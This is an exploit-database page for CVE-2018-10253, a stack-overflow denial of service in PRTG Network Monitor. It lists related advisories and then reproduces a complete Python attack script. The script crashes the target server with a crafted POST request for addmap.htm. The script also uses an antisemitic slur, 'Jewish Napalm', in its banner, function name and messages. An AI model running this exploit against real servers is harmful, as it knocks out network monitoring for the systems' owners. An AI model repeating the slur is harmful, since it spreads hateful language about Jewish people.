PRTG Network Monitor < 18.1.39.1648 - Stack Overflow Denial of Service Exploit

🗓️ 23 Apr 2018 00:00:00Reported by lurielType

zdt🔗 0day.today👁 44 Views

PRTG Network Monitor 18.1.39.1648 vulnerable to Stack Overflow denial of service exploit.

Reporter	Title	Published	Views	Family All 9
CNVD	Paessler PRTG Network Monitor Denial of Service Vulnerability	24 Apr 201800:00	–	cnvd
CVE	CVE-2018-10253	21 Apr 201802:00	–	cve
Cvelist	CVE-2018-10253	21 Apr 201802:00	–	cvelist
Exploit DB	PRTG Network Monitor < 18.1.39.1648 - Stack Overflow (Denial of Service)	23 Apr 201800:00	–	exploitdb
exploitpack	PRTG Network Monitor 18.1.39.1648 - Stack Overflow (Denial of Service)	23 Apr 201800:00	–	exploitpack
NVD	CVE-2018-10253	21 Apr 201802:29	–	nvd
OpenVAS	PRTG Network Monitor < 18.1.39.1648 Stack Overflow Vulnerability	24 Apr 201800:00	–	openvas
Packet Storm	PRTG 18.1.39.1648 Stack Overflow	23 Apr 201800:00	–	packetstorm
Prion	Code injection	21 Apr 201802:29	–	prion

# Exploit Title: PRTG 18.1.39.1648 - Stack Overflow
# Exploit Author: Lucas "luriel" Carmo
# Vendor Homepage: https://www.paessler.com/prtg
# Software Link: https://www.paessler.com/download/prtg-download
# Version: 18.1.39.1648
# CVE : CVE-2018-10253
# Post Reference: https://medium.com/stolabs/stack-overflow-jewish-napalm-on-prtg-network-monitoring-56609b0804c5
# http://www.roothc.com.br/stack-overflow-prtg-network-monitoring-jewish-napalm/
 
#!/usr/bin/python
 
import requests
import sys
import os
import re
import socket
 
green = "\033[1;32m"
yellow = '\033[1;33m'
normal = '\033[0;0m'
banner = """
     ██╗███████╗██╗    ██╗██╗███████╗██╗  ██╗    ███╗   ██╗ █████╗ ██████╗  █████╗ ██╗     ███╗   ███╗
     ██║██╔════╝██║    ██║██║██╔════╝██║  ██║    ████╗  ██║██╔══██╗██╔══██╗██╔══██╗██║     ████╗ ████║
     ██║█████╗  ██║ █╗ ██║██║███████╗███████║    ██╔██╗ ██║███████║██████╔╝███████║██║     ██╔████╔██║
██   ██║██╔══╝  ██║███╗██║██║╚════██║██╔══██║    ██║╚██╗██║██╔══██║██╔═══╝ ██╔══██║██║     ██║╚██╔╝██║
╚█████╔╝███████╗╚███╔███╔╝██║███████║██║  ██║    ██║ ╚████║██║  ██║██║     ██║  ██║███████╗██║ ╚═╝ ██║
 ╚════╝ ╚══════╝ ╚══╝╚══╝ ╚═╝╚══════╝╚═╝  ╚═╝    ╚═╝  ╚═══╝╚═╝  ╚═╝╚═╝     ╚═╝  ╚═╝╚══════╝╚═╝     ╚═╝
"""
 
 
banner2 = """
                                            Author: @Lucas "luriel" Carmo
"""
 
os.system('clear')
 
print(green+banner)
print(yellow+banner2)
print(normal)
 
def check_http(url):
    pattern = re.compile("http://")
    return re.search(pattern, url)
 
def sanitize_url(url):
    if(not check_http(url)):
        return "http://" + url
    return url
 
def check_server(url):
    r = requests.get(url, timeout=4)
    code = r.status_code
 
def send_jewish_payload(url):
    payload = {'file':'addmap.htm'}
    r = requests.post(url, params=payload)
 
def main():
    try:
        if len(sys.argv) <= 3 and len (sys.argv) >= 2:
            try:
                url = sanitize_url(sys.argv[1])
                print(' [#] LOADING!')
                if (check_server(url) != 404):
                    send_jewish_payload(url)
                else:
                    print(' [!] Server shutdown or not found')
            except requests.exceptions.ConnectionError:
                print(' [~] BOOOOOM! PRTG Server has been exploded!')
            except requests.exceptions.InvalidURL:
                print(' [!] Invalid URL')
            except requests.exceptions.Timeout:
                print(' [!] Connection Timeout\n')
        else:
            print('Example usage: ./'+sys.argv[0]+' http://192.168.0.10/index.htm')
    except KeyboardInterrupt:
        print(' [!] Jewish Napalm Canceled;.....[./]')
if __name__ == '__main__':
    main()

#  0day.today [2018-04-23]  #

23 Apr 2018 00:00Current

7.6High risk

Vulners AI Score7.6

EPSS0.10232